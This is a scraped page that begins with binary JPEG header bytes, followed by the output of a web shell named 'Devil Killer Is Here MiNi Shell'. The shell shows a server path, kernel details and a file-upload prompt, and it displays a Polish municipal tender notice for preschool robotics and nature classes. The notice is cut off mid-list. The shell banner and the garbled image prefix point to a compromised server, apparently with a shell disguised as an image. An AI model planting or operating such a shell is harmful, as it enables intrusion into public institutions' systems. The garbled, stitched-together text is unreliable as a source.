JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251106/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251106/0052120901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa polegająca na przeprowadzeniu zajęć dla uczniów w ramach projektu &#34;Maluch z pasją&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMORZĄDOWA ADMINISTRACJA PLACÓWEK OŚWIATOWYCH W WARLUBIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001113893</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dworcowa 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warlubie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 38 00 526</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">52 33 26 013</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">oswiata@warlubie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://sapowarlubie.bipstrona.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Administracja samorządowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa polegająca na przeprowadzeniu zajęć dla uczniów w ramach projektu &#34;Maluch z pasją&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-36504c00-b11e-4938-88b6-445ccf6778ed</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00521209</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00518280/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa polegająca na przeprowadzeniu zajęć dla uczniów w ramach projektu &#34;Maluch z pasją&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Maluch z pasją” nr FEKP.08.26-IZ.00-0009/24 współfinansowany ze środków Europejskiego Funduszu Społecznego Plus w ramach programu Fundusze Europejskie dla Kujaw i Pomorza 2021–2027, Priorytet 8 – Fundusze europejskie na wsparcie w obszarze rynku pracy, edukacji i wyłączenia społecznego, Działanie 08.26 – Wychowanie przedszkolne </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-36504c00-b11e-4938-88b6-445ccf6778ed <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl/pl/.<br/>Identyfikator postępowania: ocds-148610-36504c00-b11e-4938-88b6-445ccf6778ed .<br/>Szczegółowe informacje dotyczące sposobu komunikacji elektronicznej znajdują się w Rozdziale XII Specyfikacji Warunków Zamówienia (SWZ).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa § 12 Regulaminu Platformy e-Zamówienia dostępny pod adresem: https://ezamowienia.gov.pl/pl/regulamin/.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem danych osobowych w związku z realizacją postępowania: Usługa polegająca na przeprowadzeniu zajęć dla uczniów w ramach projektu „Maluch z pasją”, jest Samorządowa Administracja Placówek Oświatowych w Warlubiu, ul. Dworcowa 15, 86-160 Warlubie, tel.: 52 33 26 013, 52 38 00 526, oswiata@warlubie.pl. <br/>2.	Zobowiązuje się Wykonawcę do spełnienia obowiązku informacyjnego z art. 13 i 14 RODO, stanowiącego załączniki nr 5 i 6 do SWZ wobec osób, których dane osobowe zostaną przekazane przez Wykonawcę w związku z realizacją niniejszego postępowania.<br/>3.	Wykonawca oświadcza, że wypełnił obowiązek informacyjny przewidziany w art. 13 RODO i art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowania, o którym mowa w pkt 2.<br/>4.	Wykonawca przekaże Zamawiającemu w załączeniu do oferty, podpisany przez osobę/by, której dane dotyczą odpowiednio obowiązek informacyjny z art. 13 lub 14 RODO, stanowiący Załącznik nr 5 i 6 do SWZ.<br/>5.	Wykonawca przyjmuje do wiadomości, że zamówienie jest współfinansowane ze środków Europejskiego Funduszu Społecznego Plus w ramach Priorytetu 8 Fundusze europejskie na wsparcie w obszarze rynku pracy, edukacji i wyłączenia społecznego, Działania 08.26 Wychowanie przedszkolne OPPT, Celu szczegółowego: 4.F wspieranie równego dostępu do dobrej jakości, włączającego kształcenia i szkolenia oraz możliwości ich ukończenia, w szczególności w odniesieniu do grup w niekorzystnej sytuacji, od wczesnej edukacji i opieki nad dzieckiem przez ogólne i zawodowe kształcenie i szkolenie, po szkolnictwo wyższe, a także kształcenie i uczenie się dorosłych, w tym ułatwianie mobilności edukacyjnej dla wszystkich i dostępności dla osób z niepełnosprawnościami, programu Fundusze Europejskie dla Kujaw i Pomorza 2021-2027. Umowa o dofinansowanie nr UM_WR.433.3.037.2025. W związku z powyższym w ramach badania kwalifikowalności wydatków dojdzie do udostępnienia dokumentacji w tym danych osobowych następującym instytucjom: Ministrowi Funduszy i Polityki Regionalnej, jako Instytucja Zarządzająca FEDKP 2021-2027 oraz zarządzający Centralnym Systemie Teleinformatycznym wspierającym realizację FEDKP 2021-2027, pełni również rolę Administratora danych osobowych. Instytucją Zarządzającą jest Urząd Marszałkowski w Toruniu, pełni również funkcję Instytucji Pośredniczącej, a także podmiotu przetwarzającego na podstawie Porozumienia w sprawie powierzania przetwarzania danych osobowych w związku z realizacją Programu FEDKP lata 2021-2027.<br/>6.	Zgodnie z zapisami umowy o dofinansowanie, Zamawiający został zobowiązany do spełnienia obowiązku informacyjnego w imieniu Administratorów, o których mowa w pkt 5.<br/>7.	Zobowiązuje się Wykonawcę do spełnienia obowiązku informacyjnego z art. 13 i 14 RODO, stanowiącego załączniki nr 5 i 6 do SWZ wobec osób, których dane osobowe zostaną przekazane przez Wykonawcę w związku z realizacją niniejszego postępowania.<br/>8.	Wykonawca oświadcza, że wypełnił obowiązek informacyjny przewidziany w art. 13 RODO i art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowania, o którym mowa w punkcie 7.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SAPO.271.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia dla Części I – nauka w praktyce: warsztaty z robotyki i programowania – 720 h (10 gr. x 2 zajęcia/tyg. x 36 tyg.) średnia liczebność dzieci w grupie 10 osób – 5 grup OWP Warlubie, 4 grupy OWP Wielki Komorsk, 1 grupa OWP Lipinki):<br/>1)	zajęcia „Warsztaty z robotyki i programowania” to specjalistyczne warsztaty technologiczne rozwijające kompetencje uczniów w zakresie zaawansowanego programowania, inżynierii i automatyki. Program obejmuje praktyczne projektowanie, budowę i testowanie robotów. Treści zajęć wyraźnie wykraczają poza podstawę programową OWP, rozwijając umiejętności techniczne, inżynieryjne i cyfrowe na poziomie niedostępnym w standardowych lekcjach informatyki czy techniki. Dzieci na warsztatach poznają zasady mechaniki (budują konstrukcje, dzięki którym doświadczają praw fizyki, poznają różne mechanizmy i sprawdzają ich działanie, uczą się matematyki oddając się świetnej zabawie), konstruowania (uczą się budowania stabilnych i ruchomych konstrukcji, rozwijają wyobraźnię przestrzenną, rozwijają umiejętności manualne), wkraczają w świat programowania (na podstawie prostego, blokowego oprogramowania uczą się wprawiać konstrukcje w ruch), <br/>2)	tematyka zajęć:<br/>a)	proste budowanie i programowanie urządzeń fizycznych,<br/>b)	wstęp do automatyki,<br/>c)	podstawy działania systemów automatycznych,<br/>d)	podstawy fizyki,<br/>e)	zastosowania robotów w przemyśle, edukacji, ratownictwie, rolnictwie precyzyjnym,<br/>f)	wstęp do analizy danych przestrzennych, dostosowany do wieku odbiorców. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokonuje wyboru oferty odrębnie dla każdej części zamówienia, w oparciu o niżej wymienione kryteria oceny ofert.<br/>2.Kryterium nr 1:<br/>1) Cena (waga kryterium – 60%) – według następującego wzoru:<br/>Liczba punktów = najniższa zaoferowana cena za daną część zamówienia brutto / cena za daną część zamówienia brutto w badanej ofercie x waga kryterium.<br/>2) Do oceny przyjmuje się cenę za wykonanie danej części zamówienia brutto (z podatkiem VAT).<br/>3) Przyjmuje się, że 1% = 1 pkt i tak zostanie przeliczona liczba uzyskanych punktów.<br/>3. Kryterium nr 2:<br/>1) Elastyczność (gotowość do zmian terminów zajęć) –(waga kryterium – 40%) – według następujących zasad:<br/>a) najwyższą liczbę punktów otrzyma oferta zawierająca najkrótszy okres (liczony w dniach kalendarzowych, podanych w wartościach różnych od „0”) liczony od dnia przekazania Wykonawcy przez Zamawiającego wezwania do rozpoczęcia/zmiany/odwołania terminu realizacji zajęć w danej grupie, do dnia jego wykonania.<br/>Termin reakcji Wykonawcy na wezwanie, rozpoczyna bieg od dnia następnego po dniu, w którym Wykonawca wezwanie otrzymał i upływa w dniu, w którym Wykonawca się do niego zastosował. Przykładowo: Wykonawca który zadeklarował 1 dzień w kryterium „Elastyczność”, w przypadku jeśli otrzymał we wtorek 21.10. wezwanie w sprawie zmiany terminu zajęć z czwartku 23.10. na środę 22.10. jest zobowiązany do przeniesienia zajęć na środę 22.10. (tj. na następny dzień po otrzymaniu wezwania), <br/>b) najkrótszy okres to 1 dzień zaś najdłuższy to 5 dni, przy czym punkty będą przyznane zgodnie z poniższą tabelą:<br/>Oferowana liczba dni - Liczba punktów<br/>5 dni - 0,00<br/>4 dni - 5,00<br/>3 dni - 15,00<br/>2 dni - 30,00<br/>1 dzień - 40,00<br/>2) W sytuacji, gdy Wykonawca nie poda w ofercie terminu gotowości do zmiany, przyjmuje się, że oferuje zmianę terminu rozpoczęcia/zmiany/odwołania zajęć w najdłuższym dopuszczalnym terminie wynoszącym 5 dni, co oznacza, że Zamawiający przyzna 0,00 pkt w kryterium nr 2.<br/>3) W sytuacji, gdy Wykonawca poda w ofercie termin gotowości do zmiany dłuższy niż 5 dni, jego oferta będzie podlegała odrzuceniu, jako niezgodna z treścią zapytania ofertowego.<br/>4. Przyjmuje się, że 1% = 1 pkt i tak zostanie przeliczona liczba uzyskanych punktów.<br/>5. Oferty zostaną ocenione przez Zamawiającego w oparciu o łączną wagę kryteriów równą 100%.<br/>6. Za najkorzystniejszą w zakresie danej części zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów (Kryterium nr 1 + Kryterium nr 2).<br/>7. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium cena.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Elastyczność (gotowość do zmiany terminów zajęć)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia dla Części II – odkrywcy natury: zajęcia rozwijające kompetencje matematyczno-przyrodnicze – 360 h (10 gr. x 1 zajęcia/tyg. x 36 tyg.) średnia liczebność dzieci w grupie 10 osób – 5 grup OWP Warlubie, 4 grupy OWP Wielki Komorsk, 1 grupa OWP Lipinki:<br/>1)	zajęcia „Odkrywcy natury: zajęcia rozwijające kompetencje matematyczno-przyrodnicze” to zajęcia rozwijające kompetencje matematyczno-przyrodnicze, cyfrowe, naukowo-techniczne i kształtujące postawy proekologiczne. Warsztaty matematyczno-przyrodnicze zapewnią dzieciom dostęp do interaktywnych zajęć z zakresu biologii, matematyki, geologii i innych nauk przyrodniczych. Celem warsztatów jest rozbudzenie zainteresowania naukami przyrodniczymi, inspiracja do aktywnego uczestnictwa w odkrywaniu tajemnic świata naturalnego oraz zwiększenie świadomości ekologicznej. Część warsztatów będzie prowadzona w terenie, część zaś w salach. Warsztaty matematyczno-przyrodnicze zapewnią dzieciom dostęp do interaktywnych zajęć z zakresu biologii, matematyki, geologii i innych nauk przyrodniczych. Warsztaty tworzą atrakcyjne lekcje i będą prowadzone przez doświadczonych nauczycieli i ekspertów z różnych dziedzin naukowych. Zachęci to dzieci do samodzielnego badania i eksperymentowania, rozwijając umiejętności badawcze. Celem warsztatów jest rozbudzenie zainteresowania nauką przyrodniczą wśród dzieci, inspirując ich do aktywnego uczestnictwa w odkrywaniu tajemnic świata naturalnego oraz zwiększenie ich świadomości ekologicznej. Gry i ćwiczenia umożliwią dzieciom zarówno współdziałanie i ruch, jak i ćwiczenie koncentracji uwagi czy małej grafomotoryki. Posłużą też m.in. do rozwijania umiejętności liczenia i porównywania, umiejętności językowych w zakresie słownictwa i zdolności abstrahowania i budowania świadomości ekologicznej. Umożliwią także percepcję wzrokową, spostrzegawczość, koordynację wzrokowo-ruchową i nauczą współpracy w grupie,<br/>2)	tematyka zajęć:<br/>a)	nauka geometrii (poznawanie różnych kształtów geometrycznych z bezpiecznych materiałów, tworzenie z nich modeli i układanek, co pozwoli im na lepsze zrozumienie podstawowych pojęć geometrycznych, takich jak kształt, rozmiar, symetria i porównywanie wielkości),<br/>b)	eksperymentowanie z kształtami i strukturami – dzieci będą mogły wycinać oraz wytłaczać elementy przyrodnicze, takie jak liście, zwierzęta czy formacje skalne. W ten sposób poznają różnorodność środowiska naturalnego i mogą tworzyć swoje własne modele przyrodnicze, rozwijając wyobraźnię oraz umiejętności techniczne,<br/>c)	wprowadzenie do matematyki poprzez zabawę – dzieci będą miały okazję do tworzenia liczmanów, cyfr czy innych elementów, które można wykorzystać podczas zajęć matematycznych np. do nauki liczenia, sortowania, czy grupowania według określonych cech,<br/>d)	zajęcia z podłogami interaktywnymi, wspierającymi naukę poprzez gry i symulacje, co sprawi, że nauka matematyki i przyrody staje się bardziej angażująca. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokonuje wyboru oferty odrębnie dla każdej części zamówienia, w oparciu o niżej wymienione kryteria oceny ofert.<br/>2.Kryterium nr 1:<br/>1) Cena (waga kryterium – 60%) – według następującego wzoru:<br/>Liczba punktów = najniższa zaoferowana cena za daną część zamówienia brutto / cena za daną część zamówienia brutto w badanej ofercie x waga kryterium.<br/>2) Do oceny przyjmuje się cenę za wykonanie danej części zamówienia brutto (z podatkiem VAT).<br/>3) Przyjmuje się, że 1% = 1 pkt i tak zostanie przeliczona liczba uzyskanych punktów.<br/>3. Kryterium nr 2:<br/>1) Elastyczność (gotowość do zmian terminów zajęć) –(waga kryterium – 40%) – według następujących zasad:<br/>a) najwyższą liczbę punktów otrzyma oferta zawierająca najkrótszy okres (liczony w dniach kalendarzowych, podanych w wartościach różnych od „0”) liczony od dnia przekazania Wykonawcy przez Zamawiającego wezwania do rozpoczęcia/zmiany/odwołania terminu realizacji zajęć w danej grupie, do dnia jego wykonania.<br/>Termin reakcji Wykonawcy na wezwanie, rozpoczyna bieg od dnia następnego po dniu, w którym Wykonawca wezwanie otrzymał i upływa w dniu, w którym Wykonawca się do niego zastosował. Przykładowo: Wykonawca który zadeklarował 1 dzień w kryterium „Elastyczność”, w przypadku jeśli otrzymał we wtorek 21.10. wezwanie w sprawie zmiany terminu zajęć z czwartku 23.10. na środę 22.10. jest zobowiązany do przeniesienia zajęć na środę 22.10. (tj. na następny dzień po otrzymaniu wezwania), <br/>b) najkrótszy okres to 1 dzień zaś najdłuższy to 5 dni, przy czym punkty będą przyznane zgodnie z poniższą tabelą:<br/>Oferowana liczba dni - Liczba punktów<br/>5 dni - 0,00<br/>4 dni - 5,00<br/>3 dni - 15,00<br/>2 dni - 30,00<br/>1 dzień - 40,00<br/>2) W sytuacji, gdy Wykonawca nie poda w ofercie terminu gotowości do zmiany, przyjmuje się, że oferuje zmianę terminu rozpoczęcia/zmiany/odwołania zajęć w najdłuższym dopuszczalnym terminie wynoszącym 5 dni, co oznacza, że Zamawiający przyzna 0,00 pkt w kryterium nr 2.<br/>3) W sytuacji, gdy Wykonawca poda w ofercie termin gotowości do zmiany dłuższy niż 5 dni, jego oferta będzie podlegała odrzuceniu, jako niezgodna z treścią zapytania ofertowego.<br/>4. Przyjmuje się, że 1% = 1 pkt i tak zostanie przeliczona liczba uzyskanych punktów.<br/>5. Oferty zostaną ocenione przez Zamawiającego w oparciu o łączną wagę kryteriów równą 100%.<br/>6. 